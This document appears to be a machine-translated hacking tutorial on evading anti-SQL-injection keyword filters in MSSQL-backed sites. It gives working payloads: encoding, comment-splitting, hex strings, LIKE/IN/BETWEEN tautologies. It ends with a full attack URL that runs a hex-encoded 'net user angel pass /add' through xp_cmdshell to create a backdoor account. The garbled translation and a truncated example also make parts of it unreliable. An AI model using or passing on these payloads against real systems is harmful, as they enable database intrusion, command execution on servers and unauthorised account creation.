Ways to bypass SQL throttling

Suddenly wondering if we can get around the limitations of SQL injection in any way? To the online survey, the methods mentioned are mostly for and and "'" and "=" Number filter breakthrough, although a bit of progress, but there are some keywords do not bypass, because I do not often invade the site so I do not dare to comment on the effect of the above filter, but it is certain that the effect will not be very good ...

After my collection, most of the anti-injection programs have filtered the following keywords:

and | Select | Update | Chr | Delete | %20from |; | Insert | Mid | Master. | Set | =

And the hardest thing to deal with is the SELECT keyword, so how do we break through them? Although the problem is not completely solved, but still say to share with you, hope to be able to introduce.
For keyword filtering, here are some of my personal ideas I've collected.

1, using the coding technology to bypass

such as UrlEncode encoding, ASCII encoding bypasses. For example, or 1=1 is%6f%72%20%31%3d%31, and test can be CHAR (101) +char (116) +char (+char).

2, through the space bypass

such as two spaces instead of a space, with tab instead of spaces, or delete all spaces, such as or ' swords ' = ' swords ', due to the loose of MSSQL, we can put or ' swords ' between the spaces, does not affect the operation.

3. Use string judgment instead

Using the classic or 1=1 to determine the bypass, such as or ' swords ' = ' swords ', this method is discussed online.

4. By type conversion modifier n bypasses

It can be said that this is a good idea, in addition to some extent, he can bypass the restrictions, but also have other role, we have to think about it. With regard to the use, such as or ' swords ' = N ' swords ', uppercase N tells the MSSQL server string as the nvarchar type, which acts as a type conversion, does not affect the injection statement itself, but can circumvent the knowledge-based pattern matching IDs.

5, through the + number disassembly string bypass

The effect is worthy of textual research, but after all is a method. such as or ' swords ' = ' SW ' + ' ords '; EXEC (' in ' + ' SERT into ' + ' ... ')

6, through like bypass

Why didn't you think of it before? such as or ' swords ' like ' SW '!!! Obviously it's easy to bypass the "=" > "Restrictions ...

7. Bypassing through in

Similar to the above-like idea, such as or ' swords ' in (' Swords ')

8. Bypassing by between

such as or ' swords ' between ' rw ' and ' TW '

9, through > or < bypass

or ' swords ' > ' SW '
or ' swords ' < ' tw '
or 1<3

......

10. Use annotation statements to bypass

Replace spaces with/**/, such as: UNION/**/Select/**/user,pwd,from tbluser

Use/**/to segment sensitive words, such as: u/**/nion/**/se/**/lect/**/user,pwd from Tbluser

11, with Hex Bypass, the general IDs can not be detected

0x730079007300610064006d0069006e00 =hex (SysAdmin)
0x640062005f006f0077006e0065007200 =hex (db_owner)

In addition, with regard to the filtering method of the common point, we can consider the method of assignment, such as declaring a variable a first, then assigning our instruction to a, and then invoking the variable a to finally execute the command we entered. The variable a can be any command. As follows:

declare @a sysname
Select @a=
EXEC Master.dbo.xp_cmdshell @a

Effect Http://www.hackline.net/show.asp?id=1;declare%[email protected]% 20sysname%20select%[email protected]= 0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f

00610064006400%20exec%20master.dbo.xp_cmdshell%[email protected];–

One of the 0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 is "net User Angel Pass/add "means.

Ways to bypass SQL throttling